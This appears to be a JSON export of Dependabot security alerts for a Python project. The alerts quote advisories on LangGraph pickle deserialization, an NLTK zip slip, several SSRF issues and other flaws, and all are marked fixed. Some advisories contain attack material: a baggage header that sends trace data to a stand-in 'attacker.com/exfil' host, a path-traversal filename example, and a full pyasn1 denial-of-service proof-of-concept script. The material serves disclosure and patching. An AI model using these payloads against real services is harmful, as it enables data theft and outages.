1.0.9","first_patched_version":{"identifier":"1.0.10"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00332,"percentile":0.56073},"cvss":{"vector_string":"CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.8},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph"},"severity":"medium","vulnerable_version_range":"<= 1.0.9","first_patched_version":{"identifier":"1.0.10"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/25","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/25","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":24,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-mhr3-j7m5-c7c9","cve_id":"CVE-2026-27794","summary":"LangGraph: BaseCache Deserialization of Untrusted Data may lead to Remote Code Execution ","description":"## Context\n\nA Remote Code Execution vulnerability exists in LangGraph's caching layer when applications enable cache backends that inherit from `BaseCache` and opt nodes into caching via `CachePolicy`. Prior to `langgraph-checkpoint` 4.0.0, `BaseCache` defaults to `JsonPlusSerializer(pickle_fallback=True)`. When msgpack serialization fails, cached values can be deserialized via `pickle.loads(...)`.\n\n### Who is affected?\n\nCaching is not enabled by default. Applications are affected only when:\n\n- The application explicitly enables a cache backend (for example by passing `cache=...` to `StateGraph.compile(...)` or otherwise configuring a `BaseCache` implementation)\n- One or more nodes opt into caching via `CachePolicy`\n- The attacker can write to the cache backend (for example a network-accessible Redis instance with weak/no auth, shared cache infrastructure reachable by other tenants/services, or a writable SQLite cache file)\n\nExample (enabling a cache backend and opting a node into caching):\n\n```py\nfrom langgraph.cache.memory import InMemoryCache\nfrom langgraph.graph import StateGraph\nfrom langgraph.types import CachePolicy\n\n\ndef my_node(state: dict) -> dict:\n return {\"value\": state.get(\"value\", 0) + 1}\n\n\nbuilder = StateGraph(dict)\nbuilder.add_node(\"my_node\", my_node, cache_policy=CachePolicy(ttl=120))\nbuilder.set_entry_point(\"my_node\")\n\ngraph = builder.compile(cache=InMemoryCache())\n\nresult = graph.invoke({\"value\": 1})\n```\n\nWith `pickle_fallback=True`, when msgpack serialization fails, `JsonPlusSerializer` can fall back to storing values as a `(\"pickle\", )` tuple and later deserialize them via `pickle.loads(...)`. If an attacker can place a malicious pickle payload into the cache backend such that the LangGraph process reads and deserializes it, this can lead to arbitrary code execution.\n\nExploitation requires attacker write access to the cache backend. The serializer is not exposed as a network-facing API.\n\nThis is fixed in `langgraph-checkpoint>=4.0.0` by disabling pickle fallback by default (`pickle_fallback=False`).\n\n## Impact\n\nArbitrary code execution in the LangGraph process when attacker-controlled cache entries are deserialized.\n\n## Root Cause\n\n- `BaseCache` default serializer configuration inherited by cache implementations (`InMemoryCache`, `RedisCache`, `SqliteCache`):\n - `libs/checkpoint/langgraph/cache/base/__init__.py` (pre-fix default: `JsonPlusSerializer(pickle_fallback=True)`)\n\n- `JsonPlusSerializer` deserialization sink:\n - `libs/checkpoint/langgraph/checkpoint/serde/jsonplus.py`\n - `loads_typed(...)` calls `pickle.loads(data_)` when `type_ == \"pickle\"` and pickle fallback is enabled\n\n## Attack preconditions\n\nAn attacker must be able to write attacker-controlled bytes into the cache backend such that the LangGraph process later reads and deserializes them.\n\nThis typically requires write access to a networked cache (for example a network-accessible Redis instance with weak/no auth or shared cache infrastructure reachable by other tenants/services) or write access to local cache storage (for example a writable SQLite cache file via permissive file permissions or a shared writable volume).\n\nBecause exploitation requires write access to the cache storage layer, this is a post-compromise / post-access escalation vector.\n\n## Remediation\n\n- Upgrade to `langgraph-checkpoint>=4.0.0`.\n\n## Resources\n\n- ZDI-CAN-28385\n- Patch: https://github.com/langchain-ai/langgraph/pull/6677\n- Patch diff: https://patch-diff.githubusercontent.com/raw/langchain-ai/langgraph/pull/6677.patch\n- Credit: Peter Girnus (@gothburz), Demeng Chen, and Brandon Niemczyk (Trend Micro Zero Day Initiative)","severity":"medium","identifiers":[{"value":"GHSA-mhr3-j7m5-c7c9","type":"GHSA"},{"value":"CVE-2026-27794","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langgraph/security/advisories/GHSA-mhr3-j7m5-c7c9"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-27794"},{"url":"https://github.com/langchain-ai/langgraph/pull/6677"},{"url":"https://github.com/langchain-ai/langgraph/commit/f91d79d0c86932ded6e3b9f195d5a0bbd5aef99c"},{"url":"https://github.com/langchain-ai/langgraph/releases/tag/checkpoint%3D%3D4.0.0"},{"url":"https://github.com/advisories/GHSA-mhr3-j7m5-c7c9"}],"published_at":"2026-02-25T22:59:12Z","updated_at":"2026-02-25T22:59:14Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 4.0.0","first_patched_version":{"identifier":"4.0.0"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00366,"percentile":0.5857},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","score":6.6},"cwes":[{"cwe_id":"CWE-502","name":"Deserialization of Untrusted Data"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langgraph-checkpoint"},"severity":"medium","vulnerable_version_range":"< 4.0.0","first_patched_version":{"identifier":"4.0.0"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/24","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/24","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":23,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"nltk"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-7p94-766c-hgjp","cve_id":"CVE-2025-14009","summary":"NLTK has a Zip Slip Vulnerability","description":"A critical vulnerability exists in the NLTK downloader component of nltk/nltk, affecting all versions. The _unzip_iter function in nltk/downloader.py uses zipfile.extractall() without performing path validation or security checks. This allows attackers to craft malicious zip packages that, when downloaded and extracted by NLTK, can execute arbitrary code. The vulnerability arises because NLTK assumes all downloaded packages are trusted and extracts them without validation. If a malicious package contains Python files, such as __init__.py, these files are executed automatically upon import, leading to remote code execution. This issue can result in full system compromise, including file system access, network access, and potential persistence mechanisms.","severity":"critical","identifiers":[{"value":"GHSA-7p94-766c-hgjp","type":"GHSA"},{"value":"CVE-2025-14009","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-14009"},{"url":"https://huntr.com/bounties/49ecbc02-054e-4470-b2e0-b267936cc4e4"},{"url":"https://github.com/nltk/nltk/pull/3468"},{"url":"https://github.com/nltk/nltk/commit/1056b323af6462455571302e766b67cf300aea18"},{"url":"https://github.com/nltk/nltk/blob/4154eb85e832f266660a09286c7e37e308292284/ChangeLog#L1"},{"url":"https://github.com/advisories/GHSA-7p94-766c-hgjp"}],"published_at":"2026-02-18T18:30:40Z","updated_at":"2026-02-25T20:23:08Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00878,"percentile":0.75402},"cvss":{"vector_string":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H","score":10.0},"cwes":[{"cwe_id":"CWE-94","name":"Improper Control of Generation of Code ('Code Injection')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"nltk"},"severity":"critical","vulnerable_version_range":"<= 3.9.2","first_patched_version":{"identifier":"3.9.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/23","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/23","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":22,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langchain-core"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-2g6r-c272-w58r","cve_id":"CVE-2026-26013","summary":"LangChain affected by SSRF via image_url token counting in ChatOpenAI.get_num_tokens_from_messages","description":"## Server-Side Request Forgery (SSRF) in ChatOpenAI Image Token Counting\n\n### Summary\nThe `ChatOpenAI.get_num_tokens_from_messages()` method fetches arbitrary `image_url` values without validation when computing token counts for vision-enabled models. This allows attackers to trigger Server-Side Request Forgery (SSRF) attacks by providing malicious image URLs in user input.\n\n### Severity\n**Low** - The vulnerability allows SSRF attacks but has limited impact due to:\n- Responses are not returned to the attacker (blind SSRF)\n- Default 5-second timeout limits resource exhaustion\n- Non-image responses fail at PIL image parsing\n\n### Impact\nAn attacker who can control image URLs passed to `get_num_tokens_from_messages()` can:\n- Trigger HTTP requests from the application server to arbitrary internal or external URLs\n- Cause the server to access internal network resources (private IPs, cloud metadata endpoints)\n- Cause minor resource consumption through image downloads (bounded by timeout)\n\n**Note:** This vulnerability occurs during token counting, which may happen outside of model invocation (e.g., in logging, metrics, or token budgeting flows).\n\n### Details\nThe vulnerable code path:\n1. `get_num_tokens_from_messages()` processes messages containing `image_url` content blocks\n2. For images without `detail: \"low\"`, it calls `_url_to_size()` to fetch the image and compute token counts\n3. `_url_to_size()` performs `httpx.get(image_source)` on any URL without validation\n4. Prior to the patch, there was no SSRF protection, size limits, or explicit timeout\n\n**File:** `libs/partners/openai/langchain_openai/chat_models/base.py`\n\n### Patches\nThe vulnerability has been patched in `langchain-openai==1.1.9` (requires `langchain-core==1.2.11`).\n\nThe patch adds:\n1. **SSRF validation** using `langchain_core._security._ssrf_protection.validate_safe_url()` to block:\n - Private IP ranges (RFC 1918, loopback, link-local)\n - Cloud metadata endpoints (169.254.169.254, etc.)\n - Invalid URL schemes\n2. **Explicit size limits** (50 MB maximum, matching OpenAI's payload limit)\n3. **Explicit timeout** (5 seconds, same as `httpx.get` default)\n4. **Allow disabling image fetching** via `allow_fetching_images=False` parameter\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n1. **Sanitize input:** Validate and filter `image_url` values before passing messages to token counting or model invocation\n2. **Use network controls:** Implement egress filtering to prevent outbound requests to private IPs","severity":"low","identifiers":[{"value":"GHSA-2g6r-c272-w58r","type":"GHSA"},{"value":"CVE-2026-26013","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langchain/security/advisories/GHSA-2g6r-c272-w58r"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26013"},{"url":"https://github.com/langchain-ai/langchain/commit/2b4b1dc29a833d4053deba4c2b77a3848c834565"},{"url":"https://github.com/langchain-ai/langchain/releases/tag/langchain-core%3D%3D1.2.11"},{"url":"https://github.com/advisories/GHSA-2g6r-c272-w58r"}],"published_at":"2026-02-11T14:23:13Z","updated_at":"2026-02-11T14:23:18Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00019,"percentile":0.0505},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L","score":3.7},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langchain-core"},"severity":"low","vulnerable_version_range":"< 1.2.11","first_patched_version":{"identifier":"1.2.11"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/22","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/22","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":21,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"cryptography"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-r6ph-v2qm-q3c2","cve_id":"CVE-2026-26007","summary":"cryptography Vulnerable to a Subgroup Attack Due to Missing Subgroup Validation for SECT Curves","description":"## Vulnerability Summary\n\nThe `public_key_from_numbers` (or `EllipticCurvePublicNumbers.public_key()`), `EllipticCurvePublicNumbers.public_key()`, `load_der_public_key()` and `load_pem_public_key()` functions do not verify that the point belongs to the expected prime-order subgroup of the curve.\n\nThis missing validation allows an attacker to provide a public key point `P` from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as `S = [victim_private_key]P` via ECDH, this leaks information about `victim_private_key mod (small_subgroup_order)`. For curves with cofactor > 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it's easy to forge signatures on the small subgroup.\n\nOnly SECT curves are impacted by this.\n\n## Credit\n\nThis vulnerability was discovered by:\n- XlabAI Team of Tencent Xuanwu Lab\n- Atuin Automated Vulnerability Discovery Engine","severity":"high","identifiers":[{"value":"GHSA-r6ph-v2qm-q3c2","type":"GHSA"},{"value":"CVE-2026-26007","type":"CVE"}],"references":[{"url":"https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"},{"url":"https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"},{"url":"https://github.com/pyca/cryptography/releases/tag/46.0.5"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-26007"},{"url":"http://www.openwall.com/lists/oss-security/2026/02/10/4"},{"url":"https://github.com/advisories/GHSA-r6ph-v2qm-q3c2"}],"published_at":"2026-02-10T21:27:06Z","updated_at":"2026-02-13T08:47:30Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","score":8.2}},"epss":{"percentage":9.0e-05,"percentile":0.00867},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-345","name":"Insufficient Verification of Data Authenticity"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"cryptography"},"severity":"high","vulnerable_version_range":"<= 46.0.4","first_patched_version":{"identifier":"46.0.5"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/21","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/21","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:07Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:07Z","auto_dismissed_at":null},{"number":20,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"langsmith"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-v34v-rq6j-cj6p","cve_id":"CVE-2026-25528","summary":"LangSmith Client SDK Affected by Server-Side Request Forgery via Tracing Header Injection","description":"## Summary\n\nThe LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary `api_url` values through the `baggage` header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.\n\n---\n\n## Description\n\nWhen using distributed tracing, the SDK parses incoming HTTP headers via `RunTree.from_headers()` in Python or `RunTree.fromHeaders()` in Typescript. The `baggage` header can contain replica configurations including `api_url` and `api_key` fields.\n\nPrior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's `post()` and `patch()` methods send run data to all configured replica URLs, including any injected by an attacker.\n\n---\n\n## Attack Vector\n\n1. Attacker sends an HTTP request to a vulnerable service with a malicious `baggage` header:\n ```\n baggage: langsmith-replicas=[{\"api_url\":\"https://attacker.com/exfil\",\"project_name\":\"x\"}]\n ```\n\n2. The service parses the header via `RunTree.from_headers()`, storing the attacker's URL\n\n3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to `https://attacker.com/exfil`\n\n---\n\n## Impact\n\n- **Data Exfiltration:** Sensitive trace data including LLM prompts, completions, and application metadata sent to attacker-controlled servers\n- **SSRF:** Ability to make the server send requests to arbitrary URLs, potentially targeting internal services\n\n---\n\n## Affected Use Cases\n\nApplications are vulnerable if they:\n- Use `TracingMiddleware` to automatically propagate tracing context\n- Call `RunTree.from_headers()` / `RunTree.fromHeaders()` with untrusted HTTP headers\n\n---\n\n## Remediation\n\nUpdate to the patched versions:\n- **Python:** `pip install langsmith>=0.6.3`\n- **JavaScript:** `npm install langsmith@>=0.4.6`\n\nThe fix filters incoming replica configurations to an allowlist of safe fields, removing `api_url`, `api_key`, and other credential fields.\n\n---\n\n## Workarounds\n\nIf unable to upgrade immediately:\n- Strip or validate the `baggage` header before passing to `from_headers()`\n- Do not use `TracingMiddleware` with untrusted traffic","severity":"medium","identifiers":[{"value":"GHSA-v34v-rq6j-cj6p","type":"GHSA"},{"value":"CVE-2026-25528","type":"CVE"}],"references":[{"url":"https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-v34v-rq6j-cj6p"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25528"},{"url":"https://github.com/advisories/GHSA-v34v-rq6j-cj6p"}],"published_at":"2026-02-09T20:36:59Z","updated_at":"2026-02-09T22:39:22Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},{"package":{"ecosystem":"npm","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.3.41, < 0.4.6","first_patched_version":{"identifier":"0.4.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00014,"percentile":0.02521},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N","score":5.8},"cwes":[{"cwe_id":"CWE-918","name":"Server-Side Request Forgery (SSRF)"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"langsmith"},"severity":"medium","vulnerable_version_range":">= 0.4.10, < 0.6.3","first_patched_version":{"identifier":"0.6.3"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/20","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/20","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":19,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"protobuf"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-7gcm-g887-7qv7","cve_id":"CVE-2026-0994","summary":"protobuf affected by a JSON recursion depth bypass","description":"A denial-of-service (DoS) vulnerability exists in google.protobuf.json_format.ParseDict() in Python, where the max_recursion_depth limit can be bypassed when parsing nested google.protobuf.Any messages.\n\nDue to missing recursion depth accounting inside the internal Any-handling logic, an attacker can supply deeply nested Any structures that bypass the intended recursion limit, eventually exhausting Python’s recursion stack and causing a RecursionError.","severity":"high","identifiers":[{"value":"GHSA-7gcm-g887-7qv7","type":"GHSA"},{"value":"CVE-2026-0994","type":"CVE"}],"references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-0994"},{"url":"https://github.com/protocolbuffers/protobuf/pull/25239"},{"url":"https://github.com/protocolbuffers/protobuf/issues/25070"},{"url":"https://github.com/protocolbuffers/protobuf/commit/d2b001626d137c62dfee6c88c87324102531868b"},{"url":"https://github.com/protocolbuffers/protobuf/commit/5ebddcb1bcbe51d1fe323baa145e85f4f23128cf"},{"url":"https://github.com/advisories/GHSA-7gcm-g887-7qv7"}],"published_at":"2026-01-23T15:31:35Z","updated_at":"2026-02-05T15:47:46Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":">= 6.30.0rc1, <= 6.33.4","first_patched_version":{"identifier":"6.33.5"}},{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}}],"cvss_severities":{"cvss_v3":{"vector_string":null,"score":0.0},"cvss_v4":{"vector_string":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L","score":8.2}},"epss":{"percentage":0.00013,"percentile":0.02136},"cvss":{"vector_string":null,"score":0.0},"cwes":[{"cwe_id":"CWE-674","name":"Uncontrolled Recursion"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"protobuf"},"severity":"high","vulnerable_version_range":"< 5.29.6","first_patched_version":{"identifier":"5.29.6"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/19","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/19","created_at":"2026-04-30T08:37:33Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":18,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"python-multipart"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"direct"},"security_advisory":{"ghsa_id":"GHSA-wp53-j4wj-2cfg","cve_id":"CVE-2026-24486","summary":"Python-Multipart has Arbitrary File Write via Non-Default Configuration","description":"### Summary\n\nA Path Traversal vulnerability exists when using non-default configuration options `UPLOAD_DIR` and `UPLOAD_KEEP_FILENAME=True`. An attacker can write uploaded files to arbitrary locations on the filesystem by crafting a malicious filename.\n\n### Details\n\nWhen `UPLOAD_DIR` is set and `UPLOAD_KEEP_FILENAME` is `True`, the library constructs the file path using `os.path.join(file_dir, fname)`. Due to the behavior of `os.path.join()`, if the filename begins with a `/`, all preceding path components are discarded:\n\n```py\nos.path.join(\"/upload/dir\", \"/etc/malicious\") == \"/etc/malicious\"\n```\n \nThis allows an attacker to bypass the intended upload directory and write files to arbitrary paths. \n \n#### Affected Configuration \n \nProjects are only affected if all of the following are true: \n- `UPLOAD_DIR` is set\n- `UPLOAD_KEEP_FILENAME` is set to True\n- The uploaded file exceeds `MAX_MEMORY_FILE_SIZE` (triggering a flush to disk)\n\nThe default configuration is not vulnerable. \n \n#### Impact \n \nArbitrary file write to attacker-controlled paths on the filesystem. \n \n#### Mitigation \n \nUpgrade to version 0.0.22, or avoid using `UPLOAD_KEEP_FILENAME=True` in project configurations.","severity":"high","identifiers":[{"value":"GHSA-wp53-j4wj-2cfg","type":"GHSA"},{"value":"CVE-2026-24486","type":"CVE"}],"references":[{"url":"https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg"},{"url":"https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4"},{"url":"https://github.com/Kludex/python-multipart/releases/tag/0.0.22"},{"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-24486"},{"url":"https://github.com/advisories/GHSA-wp53-j4wj-2cfg"}],"published_at":"2026-01-26T23:28:05Z","updated_at":"2026-01-29T03:24:54Z","withdrawn_at":null,"vulnerabilities":[{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}}],"cvss_severities":{"cvss_v3":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cvss_v4":{"vector_string":null,"score":0.0}},"epss":{"percentage":0.00958,"percentile":0.76549},"cvss":{"vector_string":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L","score":8.6},"cwes":[{"cwe_id":"CWE-22","name":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')"}],"classification":"general"},"security_vulnerability":{"package":{"ecosystem":"pip","name":"python-multipart"},"severity":"high","vulnerable_version_range":"< 0.0.22","first_patched_version":{"identifier":"0.0.22"}},"url":"https://api.github.com/repos/Fearvox/EverOS/dependabot/alerts/18","html_url":"https://github.com/Fearvox/EverOS/security/dependabot/18","created_at":"2026-04-30T08:37:32Z","updated_at":"2026-05-13T05:27:06Z","dismissal_request":null,"assignees":[],"dismissed_at":null,"dismissed_by":null,"dismissed_reason":null,"dismissed_comment":null,"fixed_at":"2026-05-13T05:27:06Z","auto_dismissed_at":null},{"number":17,"state":"fixed","dependency":{"package":{"ecosystem":"pip","name":"pyasn1"},"manifest_path":"methods/evermemos/uv.lock","scope":"runtime","relationship":"transitive"},"security_advisory":{"ghsa_id":"GHSA-63vm-454h-vhhq","cve_id":"CVE-2026-23490","summary":"pyasn1 has a DoS vulnerability in decoder","description":"### Summary\n\nAfter reviewing pyasn1 v0.6.1 a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets.\n\n### Details\n\nThe integer issue can be found in the decoder as `reloid += ((subId << 7) + nextSubId,)`: https://github.com/pyasn1/pyasn1/blob/main/pyasn1/codec/ber/decoder.py#L496\n\n### PoC\n\nFor the DoS:\n```py\nimport pyasn1.codec.ber.decoder as decoder\nimport pyasn1.type.univ as univ\nimport sys\nimport resource\n\n# Deliberately set memory limit to display PoC\ntry:\n resource.setrlimit(resource.RLIMIT_AS, (100*1024*1024, 100*1024*1024))\n print(\"[*] Memory limit set to 100MB\")\nexcept:\n print(\"[-] Could not set memory limit\")\n\n# Test with different payload sizes to find the DoS threshold\npayload_size_mb = int(sys.argv[1])\n\nprint(f\"[*] Testing with {payload_size_mb}MB payload...\")\n\npayload_size = payload_size_mb * 1024 * 1024\n# Create payload with continuation octets\n# Each 0x81 byte indicates continuation, causing bit shifting in decoder\npayload = b'\\x81' * payload_size + b'\\x00'\nlength = len(payload)\n\n# DER length encoding (supports up to 4GB)\nif length < 128:\n length_bytes = bytes([length])\nelif length < 256:\n length_bytes = b'\\x81' + length.to_bytes(1, 'big')\nelif length < 256**2:\n length_bytes = b'\\x82' + length.to_bytes(2, 'big')\nelif length < 256**3:\n length_bytes = b'\\x83' + length.to_bytes(3, 'big')\nelse:\n # 4 bytes can handle up to 4GB\n length_bytes = b'\\x84' + length.to_bytes(4, 'big')\n\n# Use OID (0x06) for more aggressive parsing\nmalicious_packet = b'\\x06' + length_bytes + payload\n\nprint(f\"[*] Packet size: {len(malicious_packet) / 1024 / 1024:.1f} MB\")\n\ntry:\n print(\"[*] Decoding (this may take time or exhaust memory)...\")\n result = decoder.decode(malicious_packet, asn1Spec=univ.ObjectIdentifier())\n\n print(f'[+] Decoded successfully')\n print(f'[!] Object size: {sys.getsizeof(result[0])} bytes')\n\n # Try to convert to string\n print('[*] Converting to string...')\n try:\n str_result = str(result[0])\n print(f'[+] String succeeded: {len(str_result)} chars')\n if len(str_result) > 10000:\n print(f'[!] MEMORY EXPLOSION: {len(str_result)} character string!')\n except MemoryError:\n print(f'[-] MemoryError during string conversion!')\n except Exception as e:\n print(f'[-] {type(e).__name__} during string conversion')\n\nexcept MemoryError:\n print('[-] MemoryError: Out of memory!')\nexcept Exception as e:\n print(f'[-] Error: {type(e).__name__}: {e}')\n\n\nprint(\"\\n[*] Test completed\")\n```\n\n\nScreenshots with the results:\n\n#### 